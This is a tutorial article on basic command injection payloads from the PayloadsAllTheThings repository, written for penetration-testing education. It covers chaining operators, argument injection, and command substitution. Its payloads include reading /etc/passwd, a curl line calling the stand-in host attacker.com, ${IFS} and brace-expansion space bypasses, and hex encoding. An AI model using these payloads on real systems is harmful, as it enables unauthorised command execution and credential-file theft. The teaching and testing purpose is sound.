# Basic Command Injection Payloads: Essential Techniques from PayloadsAllTheThings

> Learn basic command injection payloads to execute OS commands by injecting shell metacharacters into vulnerable applications. Essential techniques from PayloadsAllTheThings.

- Repository: [Swissky/PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)
- Tags: tutorial
- Published: 2026-03-01

---

**Basic command injection payloads allow attackers to execute arbitrary OS commands by injecting shell metacharacters into vulnerable applications that incorporate unsanitized user input into system calls.**

The **PayloadsAllTheThings** repository maintains a curated collection of security testing payloads used by penetration testers and bug bounty hunters worldwide. This article examines the basic command injection payloads documented in the `Command Injection/README.md` file, providing practical examples of how simple shell syntax can lead to OS-level command execution in vulnerable applications.

## What Is Command Injection?

Command injection occurs when an application incorporates unsanitized user input into a shell command. According to the PayloadsAllTheThings source code, attackers inject additional commands or arguments, causing the underlying operating system to execute arbitrary code ranging from information disclosure (e.g., reading `/etc/passwd`) to full system compromise.

The repository organizes these techniques into categories including simple command syntax, command chaining, argument injection, and in-command tricks.

## Core Command Injection Concepts

The `Command Injection/README.md` (lines 68-94) structures basic techniques into four fundamental building blocks that form the foundation for advanced exploitation.

### Simple Command Execution

Direct command execution happens when user input passes unfiltered to a system shell. The simplest payload executes a standalone command.

```text
cat /etc/passwd

```

This payload returns the contents of the password file on Unix-like systems when the injection point is passed directly to a shell interpreter.

### Command Chaining Operators

Shell operators combine multiple commands sequentially or conditionally. The repository documents these operators in the *Chaining Commands* section (lines 81-96).

- **`;`** - Sequential execution regardless of success
- **`&&`** - Conditional execution (second command runs only if first succeeds)
- **`||`** - Alternative execution (second command runs if first fails)
- **`|` ** - Pipe output from first command to second
- **`&`** - Background execution (detaches process)

### Argument Injection

When the base command is fixed and cannot be changed, attackers append malicious arguments to existing commands. This technique exploits vulnerable flags in utilities like `curl` or `ssh`.

```text
curl http://attacker.com -o$(id)

```

This forces `curl` to write output using a filename derived from the `id` command execution.

### In-Command Substitution

Backticks or `$()` syntax executes commands within the original command string, substituting the output into the parent command.

```text
`whoami`
$(cat /etc/passwd)

```

## Practical Basic Command Injection Payloads

These examples map directly to the payload sections in the `Command Injection/README.md`, specifically the *Basic Commands* (lines 68-78), *Chaining Commands* (lines 81-96), and *Bypass Without Space* (lines 56-63) sections.

### Reading Sensitive Files

The most basic reconnaissance payload reads system files:

```text
cat /etc/passwd

```

### Chaining Multiple Commands

Execute reconnaissance commands in sequence using the semicolon operator:

```text
ls -la; whoami

```

For conditional execution that only proceeds if the first command succeeds:

```text
id && echo "User identified"

```

### Bypassing Space Filters

When applications filter literal spaces, use the Internal Field Separator (`$IFS`) variable:

```text
cat${IFS}/etc${IFS}/passwd

```

Alternatively, employ brace expansion to execute multiple commands without spaces:

```text
{id,uname -a}

```

### Hex-Encoded Payloads

Avoid character filters using hex-encoded strings that decode at execution time:

```bash
echo -e "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"

```

When executed inside a command injection point, this decodes to `cat /etc/passwd`.

### Background Execution

Detach long-running processes that persist after the parent process ends:

```text
nohup sleep 300 > /dev/null 2>&1 &

```

## Repository Structure and Key Files

The PayloadsAllTheThings project follows a modular architecture designed for easy navigation and contribution:

- **[`README.md`](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/main/README.md)** (root) - High-level overview, navigation guide, and contribution instructions for the entire project
- **`Command Injection/README.md`** - Central catalog containing basic payloads, methodology, filter bypasses, and external lab references (lines 56-96)
- **`Command Injection/`** directory - Houses specific payload categories and references to automation tools like commix and interactsh
- **[`_template_vuln/README.md`](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/main/_template_vuln/README.md)** - Template structure illustrating the repository's standardized format for vulnerability categories

## Summary

- **Basic command injection payloads** exploit unsanitized input to execute OS commands through direct shell metacharacter injection.
- **Command chaining** using operators like `;`, `&&`, and `||` enables sequential or conditional execution of multiple commands in a single injection point.
- **Filter bypasses** such as `${IFS}`, brace expansion, and hex encoding evade naive input validation that blocks spaces or special characters.
- The `Command Injection/README.md` file in the PayloadsAllTheThings repository provides copy-paste payloads organized by technique for penetration testing education.

## Frequently Asked Questions

### What is the most basic command injection payload?

The simplest payload is a direct system command like `cat /etc/passwd` or `whoami` that executes when user input reaches a shell interpreter without sanitization. According to the PayloadsAllTheThings source code, this represents the foundation upon which more complex chaining and bypass techniques are built.

### How do you bypass space filters in command injection?

Use the `${IFS}` variable (Internal Field Separator) in place of literal spaces, such as `cat${IFS}/etc/passwd`, or employ brace expansion syntax like `{id,uname -a}` to execute commands without whitespace. These techniques are documented in the *Bypass Without Space* section (lines 56-63) of the `Command Injection/README.md`.

### What is the difference between command chaining and argument injection?

**Command chaining** uses operators like `;` or `&&` to append entirely new commands to the shell input stream, while **argument injection** exploits fixed base commands by appending malicious flags or values (e.g., `-o$(id)` in curl) when the original command cannot be replaced.

### Where can I practice command injection safely?

The `Command Injection/README.md` references external labs including PortSwigger Web Security Academy labs, which provide legal, isolated environments for practicing these techniques without affecting production systems. The repository also lists tools like commix for automated detection in controlled testing environments.